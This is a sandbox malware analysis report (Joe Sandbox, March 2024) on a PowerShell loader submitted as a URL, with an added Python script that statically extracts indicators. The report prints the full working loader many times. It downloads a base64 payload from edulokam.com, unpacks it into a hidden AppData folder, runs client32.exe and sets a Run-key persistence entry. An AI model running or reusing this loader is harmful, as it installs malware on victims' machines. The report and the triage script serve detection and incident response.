
Windows Analysis Report
http://C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe" -Ex Bypass -NoP -C $PTBtYpeCFHynkdkoevUtEl='https://edulokam.com/data.php?14831';$gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl=(New-Object System.Net.WebClient).DownloadString($PTBtYpeCFHynkdkoevUtEl);$arxPMyynqrYXFJuXGWYmMP=[Sy

Overview

General Information

Sample URL:http://C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe" -Ex Bypass -NoP -C $PTBtYpeCFHynkdkoevUtEl='https://edulokam.com/data.php?14831';$gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl=(New-
Analysis ID:1415280

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Suspicious command line found
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Tries to load missing DLLs
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

(Classification chart; categories: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; scale: clean / suspicious / malicious)
  • System is w10x64
  • cmd.exe (PID: 3200 cmdline: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe%22%20-Ex%20Bypass%20-NoP%20-C%20$PTBtYpeCFHynkdkoevUtEl='https://edulokam.com/data.php?14831';$gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl=(New-Object%20System.Net.WebClient).DownloadString($PTBtYpeCFHynkdkoevUtEl);$arxPMyynqrYXFJuXGWYmMP=%5BSystem.Convert%5D::FromBase64String($gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl);$zxc%20=%20Get-Random%20-Minimum%20-10%20-Maximum%2037;%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy=%5BSystem.Environment%5D::GetFolderPath('ApplicationData')+'%5CDIVX'+$zxc;if%20(!(Test-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-PathType%20Container))%20%7B%20New-Item%20-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-ItemType%20Directory%20%7D;$p=Join-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20'WWW.zip';%5BSystem.IO.File%5D::WriteAllBytes($p,$arxPMyynqrYXFJuXGWYmMP);try%20%7B%20Add-Type%20-A%20System.IO.Compression.FileSystem;%5BSystem.IO.Compression.ZipFile%5D::ExtractToDirectory($p,$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy)%7D%20catch%20%7B%20Write-Host%20'Failed:%20'%20+%20$_;%20exit%7D;$CV=Join-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20'client32.exe';if%20(Test-Path%20$CV%20-PathType%20Leaf)%20%7B%20Start-Process%20-FilePath%20$CV%7D%20else%20%7B%20Write-Host%20'No%20exe.'%7D;$AZ=Get-Item%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-Force;%20$AZ.attributes='Hidden';$s=$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy+'%5Cclient32.exe';$k='HKCU:%5CSOFTWARE%5CMicrosoft%5CWindows%5CCurrentVersion%5CRun';$v='OFFICEC';$DS='String';New-ItemProperty%20-Path%20$k%20-Name%20$v%20-Value%20$s%20-PropertyType%20$DS;" > cmdline.out 2>&1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • conhost.exe (PID: 728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • wget.exe (PID: 5264 cmdline: wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe%22%20-Ex%20Bypass%20-NoP%20-C%20$PTBtYpeCFHynkdkoevUtEl='https://edulokam.com/data.php?14831';$gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl=(New-Object%20System.Net.WebClient).DownloadString($PTBtYpeCFHynkdkoevUtEl);$arxPMyynqrYXFJuXGWYmMP=%5BSystem.Convert%5D::FromBase64String($gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl);$zxc%20=%20Get-Random%20-Minimum%20-10%20-Maximum%2037;%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy=%5BSystem.Environment%5D::GetFolderPath('ApplicationData')+'%5CDIVX'+$zxc;if%20(!(Test-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-PathType%20Container))%20%7B%20New-Item%20-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-ItemType%20Directory%20%7D;$p=Join-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20'WWW.zip';%5BSystem.IO.File%5D::WriteAllBytes($p,$arxPMyynqrYXFJuXGWYmMP);try%20%7B%20Add-Type%20-A%20System.IO.Compression.FileSystem;%5BSystem.IO.Compression.ZipFile%5D::ExtractToDirectory($p,$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy)%7D%20catch%20%7B%20Write-Host%20'Failed:%20'%20+%20$_;%20exit%7D;$CV=Join-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20'client32.exe';if%20(Test-Path%20$CV%20-PathType%20Leaf)%20%7B%20Start-Process%20-FilePath%20$CV%7D%20else%20%7B%20Write-Host%20'No%20exe.'%7D;$AZ=Get-Item%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-Force;%20$AZ.attributes='Hidden';$s=$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy+'%5Cclient32.exe';$k='HKCU:%5CSOFTWARE%5CMicrosoft%5CWindows%5CCurrentVersion%5CRun';$v='OFFICEC';$DS='String';New-ItemProperty%20-Path%20$k%20-Name%20$v%20-Value%20$s%20-PropertyType%20$DS;" MD5: 3DADB6E2ECE9C4B3E1E322E617658B60)
No configs have been found
No yara matches
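The PowerShell one-liner inside the wget argument is the actual sample. The sandbox only ran wget against the submitted string (the process tree above shows cmd.exe, conhost.exe and wget.exe, and no powershell.exe), so the download from edulokam.com, the drop under %APPDATA% and the Run-key write were never observed in this analysis. The script below is an added example and is not part of the Joe Sandbox report: it URL-decodes the argument exactly as it appears in the process tree and statically extracts the indicators a responder would hunt for (the stage-2 URL, the 47 possible DIVX<n> drop directories that Get-Random -Minimum -10 -Maximum 37 can produce, the archive and executable names, and the HKCU Run value). The ENCODED_ARG constant is copied from the report; the %APPDATA% mapping for GetFolderPath('ApplicationData'), the regex shapes and the function names are the example's own choices.

```python
"""Static triage of the sample's command line (added example, not part of the
Joe Sandbox report).  The sandbox only executed wget against the submitted
string, so the PowerShell stage never ran; every indicator below comes from
URL-decoding the wget argument in the process tree and parsing the result."""
import re
from urllib.parse import unquote

# The quoted wget argument, copied from the process tree (PID 5264).  It is
# URL-encoded because a PowerShell command line was submitted as a URL.
ENCODED_ARG = (
    "http://C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe%22%20-Ex%20Bypass%20-NoP%20-C%20"
    "$PTBtYpeCFHynkdkoevUtEl='https://edulokam.com/data.php?14831';"
    "$gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl=(New-Object%20System.Net.WebClient).DownloadString($PTBtYpeCFHynkdkoevUtEl);"
    "$arxPMyynqrYXFJuXGWYmMP=%5BSystem.Convert%5D::FromBase64String($gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl);"
    "$zxc%20=%20Get-Random%20-Minimum%20-10%20-Maximum%2037;%20"
    "$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy=%5BSystem.Environment%5D::GetFolderPath('ApplicationData')+'%5CDIVX'+$zxc;"
    "if%20(!(Test-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-PathType%20Container))%20%7B%20New-Item%20-Path%20"
    "$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-ItemType%20Directory%20%7D;"
    "$p=Join-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20'WWW.zip';%5BSystem.IO.File%5D::WriteAllBytes($p,$arxPMyynqrYXFJuXGWYmMP);"
    "try%20%7B%20Add-Type%20-A%20System.IO.Compression.FileSystem;%5BSystem.IO.Compression.ZipFile%5D::ExtractToDirectory"
    "($p,$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy)%7D%20catch%20%7B%20Write-Host%20'Failed:%20'%20+%20$_;%20exit%7D;"
    "$CV=Join-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20'client32.exe';"
    "if%20(Test-Path%20$CV%20-PathType%20Leaf)%20%7B%20Start-Process%20-FilePath%20$CV%7D%20else%20%7B%20Write-Host%20'No%20exe.'%7D;"
    "$AZ=Get-Item%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-Force;%20$AZ.attributes='Hidden';"
    "$s=$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy+'%5Cclient32.exe';"
    "$k='HKCU:%5CSOFTWARE%5CMicrosoft%5CWindows%5CCurrentVersion%5CRun';$v='OFFICEC';$DS='String';"
    "New-ItemProperty%20-Path%20$k%20-Name%20$v%20-Value%20$s%20-PropertyType%20$DS;"
)


def decode_wget_argument(encoded: str) -> str:
    # unquote, not unquote_plus: the one-liner's literal '+' concatenations must survive
    return unquote(encoded)


def _literal(ps: str, var: str):
    """Value of a single-quoted assignment $var='...', or None if $var holds an expression."""
    m = re.search(r"\$" + re.escape(var) + r"='([^']*)'", ps)
    return m.group(1) if m else None


def extract_iocs(ps: str) -> dict:
    """Pull hunting-grade indicators out of the decoded one-liner."""
    def grab(pattern, conv=lambda m: m.group(1)):
        m = re.search(pattern, ps)
        return conv(m) if m else None

    run = re.search(r"New-ItemProperty -Path \$(\w+) -Name \$(\w+)", ps)
    return {
        "exec_policy_bypass": bool(re.search(r"-Ex\w*\s+Bypass", ps, re.I)),
        "no_profile": bool(re.search(r"\s-NoP\w*\s", ps, re.I)),
        "stage2_urls": re.findall(r"'(https?://[^']+)'", ps),
        "base64_stage": "FromBase64String(" in ps,
        # [Environment]::GetFolderPath('<folder>')+'\<base>'+$<var>
        "drop_dir_base": grab(r"GetFolderPath\('(\w+)'\)\+'\\(\w+)'\+\$\w+",
                              lambda m: (m.group(1), m.group(2))),
        "random_range": grab(r"Get-Random -Minimum (-?\d+) -Maximum (-?\d+)",
                             lambda m: (int(m.group(1)), int(m.group(2)))),
        "archive": grab(r"Join-Path \$\w+ '([^']+\.zip)'"),
        "payload": grab(r"Join-Path \$\w+ '([^']+\.exe)'"),
        "hidden_attribute": "attributes='Hidden'" in ps,
        "run_key": _literal(ps, run.group(1)) if run else None,
        "run_value_name": _literal(ps, run.group(2)) if run else None,
    }


def candidate_drop_dirs(iocs: dict) -> list:
    """Get-Random -Maximum is exclusive: -Minimum -10 -Maximum 37 yields -10..36,
    i.e. 47 possible directory names.  ApplicationData is the roaming %APPDATA%."""
    folder, base = iocs["drop_dir_base"]
    lo, hi = iocs["random_range"]
    env = {"ApplicationData": "%APPDATA%"}.get(folder, folder)
    return [f"{env}\\{base}{n}" for n in range(lo, hi)]


def drop_dir_regex(iocs: dict):
    """Path regex for file telemetry that accepts only the reachable suffixes."""
    _, base = iocs["drop_dir_base"]
    lo, hi = iocs["random_range"]
    alts = "|".join(str(n) for n in range(lo, hi))
    return re.compile(r"\\" + re.escape(base) + "(?:" + alts + r")(?=\\|$)")


def triage(encoded: str = ENCODED_ARG) -> dict:
    iocs = extract_iocs(decode_wget_argument(encoded))
    iocs["candidate_drop_dirs"] = candidate_drop_dirs(iocs)
    iocs["drop_dir_regex"] = drop_dir_regex(iocs).pattern
    return iocs


if __name__ == "__main__":
    for key, value in triage().items():
        print(f"{key}: {value}")
```

Run it as a script to print the indicator dictionary. The drop-directory regex is meant for file-creation telemetry (Sysmon Event ID 11 or EDR file events) and the Run key and value name for registry telemetry (Sysmon Event ID 13), because the sandbox run produced neither; restricting the regex to the 47 reachable suffixes keeps an unrelated DIVX40 folder from firing the hunt.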

System Summary

Four Sigma rules matched the same event, the start of cmd.exe (PID 3200) with the command line listed in the process tree above (cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe%22%20-Ex%20Bypass%20-NoP%20-C%20..." > cmdline.out 2>&1):
  • Source: Process started | Author: Florian Roth (Nextron Systems)
  • Source: Process started | Author: Florian Roth (Nextron Systems)
  • Source: Process started | Author: Florian Roth (Nextron Systems)
  • Source: Process started | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger
No Snort rule has matched


AV Detection

Source: https://edulokam.com | Avira URL Cloud: Label: malware
Source: https://edulokam.com/data.php?14831 | Avira URL Cloud: Label: malware
Source: https://edulokam.com/data.php | Avira URL Cloud: Label: malware
Source: https://edulokam.com/data.php | Virustotal: Detection: 16%
Source: https://edulokam.com | Virustotal: Detection: 16%
Source: wget.exe, 00000002.00000002.2061165851.0000000000B30000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe%22%20-Ex%20Bypass%20-NoP%20-C%20$PT
Source: wget.exe, 00000002.00000002.2061165851.0000000000B36000.00000004.00000020.00020000.00000000.sdmp, cmdline.out.0.dr | String found in binary or memory: http://c/Windows/System32/WindowsPowerShell/v1.0/powershell.exe%22%20-Ex%20Bypass%20-NoP%20-C%20$PTB
Source: wget.exe, 00000002.00000002.2061165851.0000000000B36000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://edulokam.com
Source: wget.exe, 00000002.00000002.2061165851.0000000000B36000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://edulokam.com/data.php
Source: wget.exe, 00000002.00000002.2061165851.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, cmdline.out.0.dr | String found in binary or memory: https://edulokam.com/data.php?14831
Source: wget.exe, 00000002.00000002.2061165851.0000000000B36000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://edulokam.comdulokam.com
Source: wget.exe, 00000002.00000002.2061165851.0000000000B36000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://edulokam.comdulokam.comon%
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\wget.exe | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\wget.exe | Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\wget.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wget.exe | Section loaded: rasadhlp.dll
Source: classification engine | Classification label: mal68.win@4/1@0/0
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\Desktop\cmdline.out
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:728:120:WilError_03
Source: C:\Windows\SysWOW64\wget.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe, with the cmd.exe /c wget ... > cmdline.out 2>&1 command line listed in the process tree above (PID 3200)
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wget.exe, with the wget -t 2 -v -T 60 ... command line listed in the process tree above (PID 5264); the report records this event twice

Data Obfuscation

Source: unknown | Process created: C:\Windows\system32\cmd.exe, with the full cmd.exe /c wget ... > cmdline.out 2>&1 command line listed in the process tree above (PID 3200)
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: wget.exe, 00000002.00000002.2061132415.0000000000A2A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe, same cmd.exe /c wget ... command line as above (PID 3200), recorded by the report in lower case
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wget.exe, same wget -t 2 -v -T 60 ... command line as above (PID 5264), recorded in lower case; the report lists this event twice
MITRE ATT&CK Matrix (techniques listed per tactic; the leading digits are the count badges shown in the report's matrix):

  • Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses
  • Resource Development: Acquire Infrastructure; Domains; DNS Server
  • Initial Access: Valid Accounts; Default Accounts; Domain Accounts
  • Execution: 11 Command and Scripting Interpreter; Scheduled Task/Job; At
  • Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows)
  • Privilege Escalation: 1 Process Injection; 1 DLL Side-Loading; Logon Script (Windows)
  • Defense Evasion: 1 Masquerading; 1 Process Injection; 1 DLL Side-Loading
  • Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager
  • Discovery: 1 Security Software Discovery; 1 System Information Discovery; Query Registry
  • Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares
  • Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive
  • Command and Control: Data Obfuscation; Junk Data; Steganography
  • Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration
  • Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
Behavior Graph:

Behavior Graph ID: 1415280
URL: http://C:/Windows/System32/...
Start date: 25/03/2024
Architecture: WINDOWS
Score: 68
Signatures on the root node: Multi AV Scanner detection for domain / URL; Antivirus detection for URL or domain; Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet; 2 other signatures
Process tree: cmd.exe (started) -> conhost.exe (started), wget.exe (started)

Source | Detection | Scanner | Label
http://C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe%22%20-Ex%20Bypass%20-NoP%20-C%20$PTBtYpeCFHynkdkoevUtEl='https://edulokam.com/data.php?14831';$gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl=(New-Object%20System.Net.WebClient).DownloadString($PTBtYpeCFHynkdkoevUtEl);$arxPMyynqrYXFJuXGWYmMP=%5BSystem.Convert%5D::FromBase64String($gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl);$zxc%20=%20Get-Random%20-Minimum%20-10%20-Maximum%2037;%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy=%5BSystem.Environment%5D::GetFolderPath('ApplicationData')+'%5CDIVX'+$zxc;if%20(!(Test-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-PathType%20Container))%20%7B%20New-Item%20-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-ItemType%20Directory%20%7D;$p=Join-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20'WWW.zip';%5BSystem.IO.File%5D::WriteAllBytes($p,$arxPMyynqrYXFJuXGWYmMP);try%20%7B%20Add-Type%20-A%20System.IO.Compression.FileSystem;%5BSystem.IO.Compression.ZipFile%5D::ExtractToDirectory($p,$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy)%7D%20catch%20%7B%20Write-Host%20'Failed:%20'%20+%20$_;%20exit%7D;$CV=Join-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20'client32.exe';if%20(Test-Path%20$CV%20-PathType%20Leaf)%20%7B%20Start-Process%20-FilePath%20$CV%7D%20else%20%7B%20Write-Host%20'No%20exe.'%7D;$AZ=Get-Item%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-Force;%20$AZ.attributes='Hidden';$s=$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy+'%5Cclient32.exe';$k='HKCU:%5CSOFTWARE%5CMicrosoft%5CWindows%5CCurrentVersion%5CRun';$v='OFFICEC';$DS='String';New-ItemProperty%20-Path%20$k%20-Name%20$v%20-Value%20$s%20-PropertyType%20$DS; | 0% | Avira URL Cloud | safe
No Antivirus matches
Source | Detection | Scanner | Label
https://edulokam.comdulokam.comon% | 0% | Avira URL Cloud | safe
http://C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe%22%20-Ex%20Bypass%20-NoP%20-C%20$PT | 0% | Avira URL Cloud | safe
https://edulokam.com | 100% | Avira URL Cloud | malware
http://c/Windows/System32/WindowsPowerShell/v1.0/powershell.exe%22%20-Ex%20Bypass%20-NoP%20-C%20$PTB | 0% | Avira URL Cloud | safe
https://edulokam.com/data.php?14831 | 100% | Avira URL Cloud | malware
https://edulokam.comdulokam.com | 0% | Avira URL Cloud | safe
https://edulokam.com/data.php | 100% | Avira URL Cloud | malware
https://edulokam.com/data.php | 16% | Virustotal | Browse
https://edulokam.com | 16% | Virustotal | Browse
No contacted domains info
Name | Source | Malicious | Antivirus Detection | Reputation
https://edulokam.comdulokam.comon% | wget.exe, 00000002.00000002.2061165851.0000000000B36000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
https://edulokam.com | wget.exe, 00000002.00000002.2061165851.0000000000B36000.00000004.00000020.00020000.00000000.sdmp | true | 16%, Virustotal, Browse; Avira URL Cloud: malware | unknown
https://edulokam.com/data.php?14831 | wget.exe, 00000002.00000002.2061165851.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, cmdline.out.0.dr | true | Avira URL Cloud: malware | unknown
http://C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe%22%20-Ex%20Bypass%20-NoP%20-C%20$PT | wget.exe, 00000002.00000002.2061165851.0000000000B30000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | low
http://c/Windows/System32/WindowsPowerShell/v1.0/powershell.exe%22%20-Ex%20Bypass%20-NoP%20-C%20$PTB | wget.exe, 00000002.00000002.2061165851.0000000000B36000.00000004.00000020.00020000.00000000.sdmp, cmdline.out.0.dr | false | Avira URL Cloud: safe | low
https://edulokam.comdulokam.com | wget.exe, 00000002.00000002.2061165851.0000000000B36000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://edulokam.com/data.php | wget.exe, 00000002.00000002.2061165851.0000000000B36000.00000004.00000020.00020000.00000000.sdmp | true | 16%, Virustotal, Browse; Avira URL Cloud: malware | unknown
No contacted IP infos
Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1415280
Start date and time:2024-03-25 17:27:25 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 1m 39s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:urldownload.jbs
Sample URL:http://C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe" -Ex Bypass -NoP -C $PTBtYpeCFHynkdkoevUtEl='https://edulokam.com/data.php?14831';$gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl=(New-Object System.Net.WebClient).DownloadString($PTBtYpeCFHynkdkoevUtEl);$arxPMyynqrYXFJuXGWYmMP=[System.Convert]::FromBase64String($gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl);$zxc = Get-Random -Minimum -10 -Maximum 37; $jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy=[System.Environment]::GetFolderPath('ApplicationData')+'\DIVX'+$zxc;if (!(Test-Path $jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy -PathType Container)) { New-Item -Path $jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy -ItemType Directory };$p=Join-Path $jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy 'WWW.zip';[System.IO.File]::WriteAllBytes($p,$arxPMyynqrYXFJuXGWYmMP);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else { Write-Host 'No exe.'};$AZ=Get-Item $jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy -Force; $AZ.attributes='Hidden';$s=$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='OFFICEC';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:4
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal68.win@4/1@0/0
EGA Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Unable to download file
  • Exclude process from analysis (whitelisted): dllhost.exe
  • Not all processes were analyzed; the report is missing behavior information
No simulations
No context
Process:C:\Windows\SysWOW64\cmd.exe
File Type:ASCII text, with very long lines (1592), with CRLF line terminators
Category:modified
Size (bytes):1689
Entropy (8bit):5.74491121875672
Encrypted:false
SSDEEP:48:tN3BPzsO4IfPLI3KmnknspnJey1aJ3RnGQhhYnxbLg2MHnR:dPD4WPLI3KmnknspnJeyYJ3RndhYnxbU
MD5:8643BA801ADA1CB0C832B520CC3BC245
SHA1:97784C9A5311CF4C4E8520C854A315A88AE48374
SHA-256:C33E0D9B0936954CEE74B33778714CB34D79248180E45FC060A72CC49EEC8FE7
SHA-512:C9CB72882A2826E508FB8BA1DEE3F2EF30130E2A0FEC2CA4C27B10CB9AF35294E2CE46F8D9643832CAF748C93C89C3C7760DC46D69CDF76CB6B7679BB27D3245
Malicious:false
Reputation:low
Preview:--2024-03-25 17:28:14-- http://c/Windows/System32/WindowsPowerShell/v1.0/powershell.exe%22%20-Ex%20Bypass%20-NoP%20-C%20$PTBtYpeCFHynkdkoevUtEl='https://edulokam.com/data.php?14831';$gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl=(New-Object%20System.Net.WebClient).DownloadString($PTBtYpeCFHynkdkoevUtEl);$arxPMyynqrYXFJuXGWYmMP=%5BSystem.Convert%5D::FromBase64String($gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl);$zxc%20=%20Get-Random%20-Minimum%20-10%20-Maximum%2037;%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy=%5BSystem.Environment%5D::GetFolderPath('ApplicationData')+'%5CDIVX'+$zxc;if%20(!(Test-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-PathType%20Container))%20%7B%20New-Item%20-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-ItemType%20Directory%20%7D;$p=Join-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20'WWW.zip';%5BSystem.IO.File%5D::WriteAllBytes($p,$arxPMyynqrYXFJuXGWYmMP);try%20%7B%20Add-Type%20-A%20System.IO.Compression.FileSystem;%5BSystem.IO.Compression.ZipFile%5D::ExtractToDirectory($p,$jSzJrBPlfPTuRAeEvy
No static file info
No network behavior found
Target ID:0
Start time:17:28:14
Start date:25/03/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" 